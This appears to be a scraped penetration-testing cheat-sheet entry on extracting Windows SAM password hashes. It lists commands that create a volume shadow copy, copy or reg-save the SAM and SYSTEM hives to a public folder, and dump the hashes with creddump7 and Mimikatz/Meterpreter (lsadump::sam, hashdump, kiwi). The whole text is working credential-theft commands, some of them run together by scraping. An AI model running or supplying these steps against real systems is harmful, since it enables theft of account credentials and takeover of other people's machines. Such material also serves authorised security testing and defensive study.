SAM
wmic shadowcopy call create Volume='C:\'
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\Public\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\Public\system
reg save HKLM\sam C:\users\Public\sam
reg save HKLM\system C:\users\Public\systemUse creddump7 on Kali to dump passwords
git clone https://github.com/ict/creddump7
pip3 install pycryptodome
python3 pwdump.py ../system ../samlsadump::samhashdumpload kiwi
lsa_dump_samLast updated